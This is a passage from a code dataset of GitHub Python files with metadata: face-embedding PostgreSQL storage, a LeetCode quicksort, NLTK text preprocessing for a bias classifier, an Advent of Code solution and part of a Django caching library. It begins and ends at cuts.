"line_number": 122, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 122, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 122, "usage_type": "name"}, {"api_name": "itchat.send_msg", "line_number": 124, "usage_type": "call"}, {"api_name": "itchat.send_msg", "line_number": 135, "usage_type": "call"}, {"api_name": "time.strptime", "line_number": 138, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 140, "usage_type": "call"}, {"api_name": "DateUtil.get_week_day", "line_number": 149, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 149, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 149, "usage_type": "name"}, {"api_name": "itchat.send_msg", "line_number": 151, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 162, "usage_type": "call"}, {"api_name": "DateUtil.get_week_day", "line_number": 179, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 179, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 179, "usage_type": "name"}, {"api_name": "itchat.send_msg", "line_number": 182, "usage_type": "call"}, {"api_name": "itchat.send_msg", "line_number": 185, "usage_type": "call"}, {"api_name": "_thread.start_new_thread", "line_number": 190, "usage_type": "call"}, {"api_name": "_thread.start_new_thread", "line_number": 191, "usage_type": "call"}]}
+{"seq_id": "70758828329", "text": "from facekeeper.core import StorageInterface, PersonEmbedding\nimport numpy as np\nimport psycopg2\nfrom typing import List, Optional\nfrom psycopg2.extensions import register_adapter, AsIs\nfrom psycopg2.extras import RealDictCursor\n\n\ndef addapt_numpy_array(numpy_array):\n return AsIs(list(numpy_array))\n\n\nclass PostgreSQLStorage(StorageInterface):\n def __init__(self, dsn: str):\n super().__init__()\n register_adapter(np.ndarray, addapt_numpy_array)\n self.dsn = dsn\n self.conn = None\n\n def save_embedding(self, person: str, digest: str, recognizer: str, embedding: np.array, tags: List[str],) -> str:\n try:\n cur = self.get_connection().cursor()\n sql = \"INSERT INTO embeddings (person, digest, recognizer, embedding, tags) VALUES (%s, %s, %s, ARRAY%s, %s) RETURNING id\"\n cur.execute(sql, (person, digest, recognizer, embedding, tags))\n row = cur.fetchone()\n self.get_connection().commit()\n return row['id']\n except psycopg2.errors.UniqueViolation:\n self.get_connection().rollback()\n # We anyway will return the ID of already saved embedding\n return self.get_embedding_id(recognizer, digest)\n finally:\n cur.close()\n\n def get_embeddings(self, recognizer) -> List[PersonEmbedding]:\n cur = self.get_connection().cursor()\n sql = \"SELECT id, person, embedding, tags FROM embeddings WHERE recognizer = %s\"\n cur.execute(sql, (recognizer,))\n\n return [PersonEmbedding(r['id'], r['person'], np.array(r['embedding']), r['tags']) for r in cur.fetchall()]\n\n def get_embedding(self, embedding_id: str) -> dict:\n cur = self.get_connection().cursor()\n sql = \"SELECT * FROM embeddings WHERE id = %s\"\n cur.execute(sql, (embedding_id,))\n return cur.fetchone()\n\n def get_embedding_id(self, recognizer, digest) -> Optional[str]:\n cur = self.get_connection().cursor()\n cur.execute(\n \"SELECT id FROM embeddings WHERE recognizer = %s AND digest = %s\", (recognizer, digest),\n )\n row = cur.fetchone()\n return str(row['id']) if row else None\n\n def get_connection(self) -> psycopg2.extensions.connection:\n if self.conn is None:\n self.conn = self.connect()\n\n return self.conn\n\n def connect(self) -> psycopg2.extensions.connection:\n return psycopg2.connect(self.dsn, cursor_factory=RealDictCursor)\n", "repo_name": "dairlair/facekeeper", "sub_path": "facekeeper/storage/postgresql.py", "file_name": "postgresql.py", "file_ext": "py", "file_size_in_byte": 2479, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "psycopg2.extensions.AsIs", "line_number": 10, "usage_type": "call"}, {"api_name": "facekeeper.core.StorageInterface", "line_number": 13, "usage_type": "name"}, {"api_name": "psycopg2.extensions.register_adapter", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 16, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 20, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 20, "usage_type": "name"}, {"api_name": "psycopg2.errors", "line_number": 28, "usage_type": "attribute"}, {"api_name": "facekeeper.core.PersonEmbedding", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 40, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 35, "usage_type": "name"}, {"api_name": "facekeeper.core.PersonEmbedding", "line_number": 35, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 48, "usage_type": "name"}, {"api_name": "psycopg2.extensions", 
"line_number": 56, "usage_type": "attribute"}, {"api_name": "psycopg2.connect", "line_number": 63, "usage_type": "call"}, {"api_name": "psycopg2.extras.RealDictCursor", "line_number": 63, "usage_type": "name"}, {"api_name": "psycopg2.extensions", "line_number": 62, "usage_type": "attribute"}]}
+{"seq_id": "21453959135", "text": "import random\nfrom typing import List\n\n\nclass Solution:\n def sortArray(self, nums: List[int]) -> List[int]:\n low = 0\n high = len(nums)-1\n self._quick_sort(low, high, nums)\n return nums\n \n def _quick_sort(self, low: int, high: int, nums: List[int]) -> None:\n # 递归返回条件\n if low >= high:\n return\n mid = self._partition(low, high, nums)\n self._quick_sort(low, mid-1, nums)\n self._quick_sort(mid+1, high, nums)\n\n def _partition(self, low: int, high: int, nums: List[int]) -> int:\n # 选取pivot_idx\n pivot_idx = random.randint(low, high)\n # 将pivot换到首位(因为pivot已知 相当于把首位空下来)\n nums[low], nums[pivot_idx] = nums[pivot_idx], nums[low]\n pivot = nums[low]\n l, r = low, high\n while l < r:\n # r由右往左移动 找到一个小于pivot的数 将其挪到'空出来'的位置(此时的 l)\n # 完成'挪动'后此时 r 相当于也空了下来\n while l < r and nums[r] >= pivot:\n r -= 1\n nums[l] = nums[r]\n # l由左往右移动 找到一个大于pivot的数 将其挪到'空出来'的位置(此时的 r)\n # 完成'挪动'后此时 l 相当于也空了下来\n while l < r and nums[l] <= pivot:\n l += 1\n nums[r] = nums[l]\n nums[l] = pivot\n return l", "repo_name": "jerrt2003/leetcode-in-python", "sub_path": "912_Sort_an_Array/quick_sort.py", "file_name": "quick_sort.py", "file_ext": "py", "file_size_in_byte": 1450, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.List", "line_number": 6, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 12, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 20, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 22, "usage_type": "call"}]}
+{"seq_id": "5093241901", "text": "# ------------------ Importing necessary libraries -----------\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import PunktSentenceTokenizer\nfrom nltk.stem import WordNetLemmatizer \nimport nltk\nimport pickle\nimport re\n\nnltk.download('stopwords') #stopwords\nnltk.download('wordnet') #database of English language\nnltk.download('punkt') #tokenization\nnltk.download('vader_lexicon') \n \n\n# --------- Text cleaning ---------\ndef preprocess(text):\n text = str(text)\n #strip \n text = re.sub(r'.+? ', '', text) \n text = re.sub(r'.+? ', '', text)\n text = re.sub(r'<.+?>', '', text) # remove all other html tags\n text = re.sub(r'https?:\\/\\/.*[\\r\\n]*', '', text)\n \n ## remove punctuations, non-alphanumeric characters and underscores\n text = re.sub(r'[^\\w\\s]|\\d|_', ' ', text)\n \n text = str(text).lower().strip()\n \n #tokenize\n tokenizer = PunktSentenceTokenizer()\n tokens = tokenizer.tokenize(text)\n \n #remove stopwords\n stop_words = stopwords.words('english')\n tokens = [t for t in tokens if t not in stop_words]\n \n #lemmatize\n lemmatizer = WordNetLemmatizer()\n tokens = [lemmatizer.lemmatize(t) for t in tokens]\n text = \" \".join(tokens)\n text = str(text).lower().strip()\n text = [text]\n \n return text\n\n# ------- TFIDF + AdaBoost -----------\n\ndef model(text):\n # Preprocess text\n text = preprocess(text)\n \n # Load TFIDF\n tfidf = pickle.load(open(\"tfidftest.pkl\", \"rb\" ) )\n text_vectorized = tfidf.transform(text)\n \n # Apply Trained Model \n \n model = pickle.load(open('Ada10est81acc.sav', 'rb'))\n \n result = model.predict(text_vectorized)\n \n return result\n\n\n\n\n", "repo_name": "marinamer/Political-Bias-NLP", "sub_path": "Flask/ml_model.py", "file_name": "ml_model.py", "file_ext": "py", "file_size_in_byte": 1710, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "nltk.download", "line_number": 9, "usage_type": "call"}, {"api_name": "nltk.download", "line_number": 10, "usage_type": "call"}, {"api_name": "nltk.download", "line_number": 11, "usage_type": "call"}, {"api_name": "nltk.download", "line_number": 12, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 19, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 20, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 21, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 22, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 25, "usage_type": "call"}, {"api_name": "nltk.tokenize.PunktSentenceTokenizer", "line_number": 30, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords.words", "line_number": 34, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 34, "usage_type": "name"}, {"api_name": "nltk.stem.WordNetLemmatizer", "line_number": 38, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 53, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 58, "usage_type": "call"}]}
+{"seq_id": "252855898", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nsolution for day 11 of 2019\n\"\"\"\n\n__author__ = 'Guido Minieri'\n__license__ = 'GPL'\n\n\nimport sys; sys.path.append('..')\nfrom intcode import Intcode\nfrom collections import deque\nfrom matplotlib import pyplot as plt\n\n\nwith open('input.txt', 'r') as f:\n data = f.read()\n\n\nclass Robot(Intcode):\n\n def __init__(self, data, once=False, emerg_hull=False):\n self.coord = [[[0, 0], 0]]\n self.directions = deque(['up', 'right', 'down', 'left'])\n self.direction = None\n self.color = None\n self.painted = 1\n self.emerg_hull = emerg_hull\n self.inpt = None\n super().__init__(data, once)\n\n\n def getInput(self):\n \"\"\"returns the value that goes in input to op3\"\"\"\n if self.emerg_hull:\n self.emerg_hull = False\n return 1\n value = self.getCurrentColor()\n return value\n\n\n def getCurrentColor(self):\n \"\"\"returns the color of the tile the robot is standing on\"\"\"\n current = self.coord[-1]\n self.sensor_color = current[1]\n return self.sensor_color\n\n\n def manipulate(self):\n \"\"\"allows for the parsing of the 2 intcode outputs: color and rotation\"\"\"\n if len(self.outputs) % 2 == 0 and self.outputs != []:\n self.color = self.outputs[-2]\n if self.outputs[-1]:\n self.directions.rotate(-1)\n self.direction = self.directions[0]\n else:\n self.directions.rotate(1)\n self.direction = self.directions[0]\n self.move()\n\n\n def findTile(self, x, y):\n \"\"\"returns the tile if it's tracked, else None\"\"\"\n target = [x, y]\n for elem in self.coord[::-1]:\n if elem[0] == target:\n return elem\n\n\n def move(self):\n current = self.coord[-1]\n current[1] = self.color\n\n x, y = current[0] # get current coordinates\n\n if self.direction == 'up':\n y += 1\n elif self.direction == 'right':\n x += 1\n elif self.direction == 'down':\n y -= 1\n else:\n x -= 1\n\n target_tile = self.findTile(x, y)\n if target_tile:\n color = target_tile[1]\n else:\n color = 0\n self.painted += 1\n self.coord.append([[x, y], color])\n\nrobot = Robot(data)\nprint(robot.painted)\n\n\n# create a new object for part 2\nreg_ident = Robot(data, 1, emerg_hull=True)\ncode = [x[0] for x in reg_ident.coord if x[1] == 1]\n\nx_em = [x[0] for x in code]\ny_em = [y[1] for y in code]\n\nplt.scatter(x_em, y_em)\nplt.xlim(-3, 43)\nplt.ylim(-20, 20)\nplt.show()\n", "repo_name": "gmnr/advent-of-code", "sub_path": "2019/11/day11.py", "file_name": "day11.py", "file_ext": "py", "file_size_in_byte": 2671, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.path.append", "line_number": 12, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "intcode.Intcode", "line_number": 22, "usage_type": "name"}, {"api_name": "collections.deque", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": 
"name"}]}
+{"seq_id": "27212894053", "text": "import six\nimport time\nimport copy\n\nfrom distutils.version import StrictVersion\nfrom abc import ABCMeta, abstractmethod, abstractproperty\nfrom collections import defaultdict\nfrom functools import partial\n\nimport django\n\ntry:\n from django.core.cache import get_cache\nexcept ImportError:\n from django.core.cache import caches\n def get_cache(backend):\n return caches[backend]\n\nfrom django.http import Http404\nfrom django.db import models, transaction\n\ntry:\n from django.db.models import get_models\nexcept ImportError:\n from django.apps import apps\n get_models = apps.get_models\n\ntry:\n from django.db.models.fields.related import ReverseSingleRelatedObjectDescriptor\nexcept ImportError:\n from django.db.models.fields.related_descriptors import \\\n ForwardManyToOneDescriptor as ReverseSingleRelatedObjectDescriptor\n\nGenericForeignKeyObject = None\ndef importGenericForeignKey():\n global GenericForeignKeyObject\n if GenericForeignKeyObject is not None:\n return GenericForeignKeyObject\n try:\n from django.contrib.contenttypes.generic import GenericForeignKey\n GenericForeignKeyObject = GenericForeignKey\n except ImportError:\n from django.contrib.contenttypes.fields import GenericForeignKey\n GenericForeignKeyObject = GenericForeignKey\n return GenericForeignKey\n\n\nfrom flash import settings as flash_settings\nfrom flash.option import Some\nfrom flash.utils import memcache_key_escape, flash_properties\n\n\ncache = get_cache(flash_settings.CACHE_NAME)\n\n\ndef is_abstract_class(cls):\n \"\"\" Returns boolean telling whether given class is abstract or not.\n\n A class is abstract if it has not implemented any abstractmethod or\n abstractproperty of base classes.\n \"\"\"\n return bool(getattr(cls, \"__abstractmethods__\", False))\n\n\ndef instancemethod(method):\n \"\"\" Decorator for creating descriptor class to call method with\n instance when called with class.\n \"\"\"\n class MethodDisc(object):\n def __get__(self, ins, cls):\n if ins is None:\n # when method is called from class\n # get instance of that class and use that\n try:\n ins = cls()\n except NameError:\n return method\n return partial(method, ins)\n return MethodDisc()\n\n\nclass DontCache(object):\n def __init__(self, val):\n self.inner_val = val\n\n\n@six.python_2_unicode_compatible\nclass StaleData(object):\n def __init__(self, timestamp):\n self.timestamp = timestamp\n\n def __str__(self):\n return \"StaleData(timestamp=%s)\" % self.timestamp\n\n\ndef cache_get_many(keys):\n if not keys:\n return {}, {}\n\n d = cache.get_many(keys)\n result_dict = {}\n stale_data_dict = {}\n\n for key, value in d.items():\n if isinstance(value, StaleData):\n stale_data_dict[key] = value\n else:\n result_dict[key] = value\n\n return result_dict, stale_data_dict\n\n\nclass InvalidationType(object):\n OFF = 0\n UNSET = 1\n RESET = 2\n DYNAMIC = 3\n\nUSING_KWARG = '__using'\n\nclass WrappedValue(object):\n def __init__(self, value, version, timestamp):\n self.value = value\n self.version = version\n self.timestamp = timestamp\n\n\nclass Cache(six.with_metaclass(ABCMeta, object)):\n \"\"\" The very base class for all cache classes.\n\n Methods decorated with abstractmethod or abstractproperty\n have to be implemented by derived classes.\n\n It's necessary to put ABCMeta or its derived class to put\n as metaclass to achieve above constraints.\n \"\"\"\n # Derived class may provide serializer (E.g. 
for compression)\n serializer = None\n\n # default version\n version = 0\n\n # default timeout\n timeout = flash_settings.DEFAULT_TIMEOUT\n\n # default invalidation\n invalidation = InvalidationType.UNSET\n\n # default allowtime\n allowtime = None\n\n cache_type = 'SimpleCache'\n\n def __init__(self, *args, **kwargs):\n self.args = args\n self.kwargs = kwargs\n\n @property\n def key(self):\n return self.get_key(*self.args, **self.kwargs)\n\n @abstractmethod\n def get_key(self, *args, **kwargs):\n \"\"\" Returns the key for given params (args and kwargs).\n \"\"\"\n pass\n\n @instancemethod\n def get_dynamic_version(self):\n from flash.models import CacheDynamicVersion\n return CacheDynamicVersion.objects.get_version_of(type(self))\n\n @staticmethod\n def get_stale_key(key):\n return key + '__stale'\n\n def to_cache_value(self, value):\n if self.serializer:\n value = self.serializer.dumps(value)\n return value\n\n def from_cache_value(self, value):\n if self.serializer:\n value = self.serializer.loads(value)\n return value\n\n @staticmethod\n def get_write_lock_key(key):\n return key + '__write_lock'\n\n def try_acquire_write_lock(self, key):\n write_lock_key = self.get_write_lock_key(key)\n return cache.add(write_lock_key, True,\n timeout=flash_settings.WRITE_LOCK_TIMEOUT)\n\n def release_write_lock(self, key):\n write_lock_key = self.get_write_lock_key(key)\n return cache.delete(write_lock_key)\n\n def get_option_value_from_cache_coroutine(self, key, extra_keys=None,\n key_value_dict=None):\n \"\"\" key: str,\n extra_keys: list\n key_value_dict: dict,\n\n Yields value assosiated with key in cache, wrapped as Option value.\n\n If extra_keys is passed then all values are fetched assosiated with\n keys in extra_keys and put to key_value_dict.\n \"\"\"\n keys = []\n keys.append(key)\n if extra_keys is not None:\n keys.extend(extra_keys)\n\n # result_dict is dict of key value pair\n result_dict = yield keys\n\n if not result_dict:\n yield None\n return\n\n if extra_keys and (key_value_dict is not None):\n keys_found = set(result_dict.keys()) & set(extra_keys)\n for key_found in keys_found:\n key_value_dict[key_found] = result_dict[key_found]\n\n if key not in result_dict:\n yield None\n return\n\n value = result_dict[key]\n if isinstance(value, WrappedValue):\n value.value = self.from_cache_value(value.value)\n else:\n value = self.from_cache_value(value)\n yield Some(value)\n\n @abstractmethod\n def get_value_for_params(self, *args, **kwargs):\n \"\"\" The fallback method to return value for given params.\n Mostly implemented to get value from database.\n \"\"\"\n pass\n\n def get_extra_keys(self, *args, **kwargs):\n pass\n\n def get_extra_key_value_dict(self, value, *args, **kwargs):\n pass\n\n def pre_set_process_value(self, value, *args, **kwargs):\n return value\n\n def post_process_value(self, value, *args, **kwargs):\n return value\n\n def _set(self, key, value, key_value_dict=None, stale_data_dict=None,\n force_update=False):\n \"\"\" Sets the given key value in cache.\n\n If key_value_dict is passed sets all key-values\n in this dict to cache too.\n \"\"\"\n if stale_data_dict is None:\n stale_data_dict = {}\n\n value = self.to_cache_value(value)\n value = WrappedValue(value, self.get_dynamic_version(), time.time())\n\n if key_value_dict is None:\n key_value_dict = {}\n key_value_dict[key] = value\n\n for key_, value_ in key_value_dict.items():\n if key_ in stale_data_dict:\n current_value_dict = cache.get_many([key_])\n if key_ in current_value_dict:\n current_value = 
current_value_dict[key_]\n stale_value = stale_data_dict[key_]\n if (isinstance(current_value, StaleData) and\n current_value.timestamp == stale_value.timestamp):\n cache.set(key_, value_, timeout=self.timeout)\n continue\n if force_update:\n cache.set(key_, value_, timeout=self.timeout)\n else:\n cache.add(key_, value_, timeout=self.timeout)\n\n def get_coroutine(self, *args, **kwargs):\n \"\"\" Yields the value for given params (args and kwargs).\n\n First tries to get it from cache. If not found, gets it from\n fallback method and sets the value to cache.\n \"\"\"\n key = self.get_key(*args, **kwargs)\n\n is_invalidation_dynamic = (\n self.invalidation == InvalidationType.DYNAMIC)\n extra_keys = self.get_extra_keys(*args, **kwargs) or []\n if is_invalidation_dynamic:\n stale_key = self.get_stale_key(key)\n extra_keys.append(stale_key)\n key_value_dict = {}\n\n coroutine = self.get_option_value_from_cache_coroutine(key, extra_keys,\n key_value_dict)\n keys = coroutine.send(None)\n result_dict, stale_data_dict = yield keys\n option_value = coroutine.send(result_dict)\n\n return_cache_value = False\n lock_acquired = False\n force_update = False\n if option_value is not None:\n # cache found in cache\n w_value = option_value.unwrap()\n current_dynamic_version = self.get_dynamic_version()\n if isinstance(w_value, WrappedValue):\n try_acquire_lock = False\n value = w_value.value\n if self.allowtime and (\n (time.time() - w_value.timestamp) < self.allowtime):\n return_cache_value = True\n elif (current_dynamic_version is not None and\n current_dynamic_version != w_value.version):\n if self.invalidation in [\n InvalidationType.OFF,\n InvalidationType.DYNAMIC]:\n try_acquire_lock = True\n else:\n force_update = True\n elif is_invalidation_dynamic:\n is_stale = stale_key in stale_data_dict\n if not is_stale:\n return_cache_value = True\n else:\n try_acquire_lock = True\n elif self.allowtime and (\n self.invalidation == InvalidationType.OFF):\n try_acquire_lock = True\n elif self.allowtime is None:\n return_cache_value = True\n else:\n force_update = True\n if try_acquire_lock:\n lock_acquired = self.try_acquire_write_lock(key)\n if not lock_acquired:\n return_cache_value = True\n else:\n force_update = True\n else:\n value = w_value\n return_cache_value = True\n\n if not return_cache_value:\n # get value using fallback method (e.g. 
db)\n value = self.get_value_for_params(*args, **kwargs)\n if not isinstance(value, DontCache):\n key_value_dict = self.get_extra_key_value_dict(\n value, *args, **kwargs)\n\n set_value_in_cache = True\n if (option_value is None and key in stale_data_dict and\n (time.time() - stale_data_dict[key].timestamp) < 0.3):\n # cache was just invalidated\n # db may return stale data\n # hence\n set_value_in_cache = False\n\n if StrictVersion(django.get_version()) < StrictVersion('1.7'):\n transaction.commit_unless_managed()\n\n value = self.pre_set_process_value(value, *args, **kwargs)\n\n # set the key value in cache\n if set_value_in_cache:\n self._set(key, value, key_value_dict, stale_data_dict,\n force_update=force_update)\n\n if is_invalidation_dynamic:\n cache.delete(stale_key)\n\n if lock_acquired:\n self.release_write_lock(key)\n\n if isinstance(value, DontCache):\n value = value.inner_val\n\n value = self.post_process_value(\n value, key_value_dict, *args, **kwargs)\n yield value\n\n def resolve_coroutine(self):\n return self.get_coroutine(*self.args, **self.kwargs)\n\n def get(self, *args, **kwargs):\n \"\"\" Returns the yielded vale from get_coroutine method\n \"\"\"\n coroutine = self.get_coroutine(*args, **kwargs)\n keys = coroutine.send(None)\n if flash_settings.DONT_USE_CACHE:\n result_dict, stale_data_dict = {}, {}\n else:\n result_dict, stale_data_dict = cache_get_many(keys)\n value = coroutine.send((result_dict, stale_data_dict))\n return value\n\n def resolve(self):\n return self.get(*self.args, **self.kwargs)\n\n def reset(self, *args, **kwargs):\n \"\"\" Resets the value in cache using fallback method for given params\n \"\"\"\n if flash_settings.DONT_USE_CACHE:\n return\n key = self.get_key(*args, **kwargs)\n value = self.get_value_for_params(*args, **kwargs)\n key_value_dict = self.get_extra_key_value_dict(value, *args, **kwargs)\n value = self.pre_set_process_value(value, *args, **kwargs)\n self._set(key, value, key_value_dict)\n\n def set(self, params, value, pre_set_process=True):\n \"\"\" Sets the given value in cache for given params\n \"\"\"\n if flash_settings.DONT_USE_CACHE:\n return\n key = self.get_key(**params)\n if pre_set_process:\n value = self.pre_set_process_value(value, **params)\n self._set(key, value, force_update=True)\n\n def resolve_async(self):\n from .loader import FlashCacheLoader\n from thread_context.dataloader_context import DataLoadersFactory\n\n loader = DataLoadersFactory.get_loader_for(FlashCacheLoader)\n return loader.load(self)\n\n\nclass BatchCacheQuery(object):\n \"\"\" Class to make multiple cache queries into one\n \"\"\"\n def __init__(self, *args, **queries):\n if args:\n self.queries = args[0]\n else:\n self.queries = queries\n\n def push(self, *args, **kwargs):\n if args:\n self.queries.update(args[0])\n else:\n self.queries.update(kwargs)\n\n def get(self, only_cache=False, none_on_exception=False,\n return_exceptions=False):\n all_cache_keys = set()\n coroutines_dict = {}\n value_dict = {}\n\n for key, cache_query in self.queries.items():\n coroutine = cache_query.resolve_coroutine()\n cache_keys = coroutine.send(None)\n all_cache_keys.update(cache_keys)\n coroutines_dict[key] = (coroutine, cache_keys)\n\n all_cache_keys = list(all_cache_keys)\n all_cache_result, all_stale_data_dict = cache_get_many(all_cache_keys)\n\n for key in coroutines_dict:\n coroutine, cache_keys = coroutines_dict[key]\n result_dict = {}\n stale_data_dict = {}\n\n to_continue = False\n for cache_key in cache_keys:\n if cache_key in all_cache_result:\n 
result_dict[cache_key] = all_cache_result[cache_key]\n elif only_cache:\n to_continue = True\n break\n elif cache_key in all_stale_data_dict:\n stale_data_dict[cache_key] = all_stale_data_dict[cache_key]\n if to_continue:\n continue\n\n try:\n value = coroutine.send((result_dict, stale_data_dict))\n value_dict[key] = value\n except Exception as e:\n if return_exceptions:\n value_dict[key] = e\n elif none_on_exception:\n value_dict[key] = None\n else:\n raise\n return value_dict\n\n\nclass BaseModelQueryCacheMeta(ABCMeta):\n \"\"\" Meta class for BaseModelQueryCache class.\n\n Deriving it from ABCMeta because BaseModelQueryCache is\n derived from Cache class wich has metaclass ABCMeta\n \"\"\"\n model_caches = defaultdict(list)\n model_caches_on_target_model = defaultdict(list)\n\n def __init__(self, *args, **kwargs):\n \"\"\" self is the class with BaseModelQueryCacheMeta as its\n metaclass\n \"\"\"\n super(BaseModelQueryCacheMeta, self).__init__(*args, **kwargs)\n\n if is_abstract_class(self):\n return\n\n # register self in model_caches dict corressponding to all the models\n # against which cache should get invalidated.\n for model in self.get_invalidation_models():\n self.model_caches[model].append(self)\n\n target_models = self.get_cache_model()\n if target_models:\n if not isinstance(target_models, (list, tuple)):\n # If it's a single model\n target_models = [target_models]\n for target_model in target_models:\n self.model_caches_on_target_model[target_model].append(self)\n\n\nclass BaseModelQueryCache(six.with_metaclass(BaseModelQueryCacheMeta, Cache)):\n \"\"\" Base class for all cache classes which cache some query's result\n on assosiated model.\n \"\"\"\n generic_fields_support = True\n\n def __init__(self, *args, **kwargs):\n if USING_KWARG in kwargs:\n self.using = kwargs.pop(USING_KWARG)\n else:\n self.using = self.get_using()\n super(BaseModelQueryCache, self).__init__(*args, **kwargs)\n\n @abstractproperty\n def model(self):\n pass\n\n def get_cache_model(self):\n return None\n\n @abstractproperty\n def key_fields(self):\n pass\n\n def get_using(self):\n return flash_settings.db_discoverer_func(self.model)\n\n def get_queryset(self):\n return self.model.objects.using(self.using)\n\n @instancemethod\n def get(self, *args, **kwargs):\n if USING_KWARG in kwargs:\n self.using = kwargs.pop(USING_KWARG)\n return super(BaseModelQueryCache, self).get(*args, **kwargs)\n\n @instancemethod\n def set(self, *args, **kwargs):\n return super(BaseModelQueryCache, self).set(*args, **kwargs)\n\n @abstractmethod\n def get_invalidation_models(self):\n pass\n\n @abstractmethod\n def get_keys_to_be_invalidated(self, instance, signal, using):\n pass\n\n def get_field_dict(self, *args, **kwargs):\n \"\"\" Returns the given params as dict of field_name as key\n and given param value as value\n \"\"\"\n field_dict = {}\n args_len = len(args)\n if args:\n # put all values in args in same order as of field_name in\n # key_fields starting.\n for i in range(args_len):\n field_name = self.key_fields[i]\n field_dict[field_name] = args[i]\n if kwargs:\n # iterate over all rest key_fields and take values from kwargs\n for field_name in self.key_fields[args_len:]:\n if field_name in kwargs:\n field_dict[field_name] = kwargs[field_name]\n else:\n # check if field is passed in kwargs as attname of field\n # If field is a related field (E.g. ForeignKey) then its\n # attname is actually postfixed with `_id`.\n # E.g. 
user field has attname user_id\n field = self.model._meta.get_field(field_name)\n if field.attname in kwargs:\n field_dict[field.attname] = kwargs[field.attname]\n else:\n raise KeyFieldNotPassed(field_name)\n return field_dict\n\n @instancemethod\n def get_key(self, *args, **kwargs):\n cls_name = self.__class__.__name__\n using = kwargs.pop(USING_KWARG, self.using)\n key = '%s__%s__%s' % (self.cache_type, using, cls_name)\n field_dict = self.get_field_dict(*args, **kwargs)\n\n for field_name in self.key_fields:\n if self.generic_fields_support:\n if hasattr(self.model, field_name):\n field_obj = getattr(self.model, field_name)\n GenericForeignKey = importGenericForeignKey()\n if isinstance(field_obj, GenericForeignKey):\n value = field_dict[field_name]\n if isinstance(value, tuple):\n ctype_id, object_id = value\n else:\n from django.contrib.contenttypes.models import ContentType\n ctype_id = ContentType.objects_cache.get_for_model(\n value).id\n object_id = getattr(value, value._meta.pk.attname)\n key += '__%s-%s' % (ctype_id, object_id)\n continue\n\n field = self.model._meta.get_field(field_name)\n\n if field_name in field_dict:\n value = field_dict[field_name]\n else:\n value = field_dict[field.attname]\n if isinstance(value, models.Model):\n # get the pk value on instance\n if field.rel:\n rel_model = field.rel.to\n else:\n # In very rare cases, field.rel is found to be None\n # that I do not know why.\n # fallback method to get rel_model\n rel_model = value.__class__\n value = getattr(value, rel_model._meta.pk.attname)\n \"\"\"\n if isinstance(value, unicode):\n value = value.encode('utf-8')\n \"\"\"\n key += '__%s' % str(value)\n key += '__v%s' % self.version\n key = memcache_key_escape(key)\n return key\n\n\nclass InstanceCacheMeta(BaseModelQueryCacheMeta):\n \"\"\" Meta class for InstanceCache class\n \"\"\"\n instance_cache_classes = defaultdict(list)\n\n def __new__(cls, *args, **kwargs):\n ncls = super(InstanceCacheMeta, cls).__new__(cls, *args, **kwargs)\n if is_abstract_class(ncls):\n return ncls\n model = ncls.model\n # store the new class's single instance with its model\n # in instance_cache_classes dict\n cls.instance_cache_classes[model].append(ncls)\n if (six.get_unbound_function(ncls.get_instance) ==\n six.get_unbound_function(InstanceCache.get_instance)):\n # if the get_instance method is not overriden then mark the class\n # as simple\n ncls.is_simple = True\n else:\n ncls.is_simple = False\n # ask the class the class to create assosiated related instance classes\n # if any\n ncls.register_related_caches()\n return ncls\n\n\nclass KeyFieldNotPassed(Exception):\n def __init__(self, field_name):\n msg = 'key field `%s` not given' % field_name\n super(KeyFieldNotPassed, self).__init__(msg)\n\n\nclass SameModelInvalidationCache(object):\n \"\"\" Mixin class to be used with InstanceCache, QuerysetCache classes.\n \"\"\"\n\n def _get_invalidation_models(self):\n return [self.model]\n\n def _get_keys_to_be_invalidated(self, instance, signal, using):\n keys = []\n for params in self.get_invalidation_params_list_(instance, signal):\n 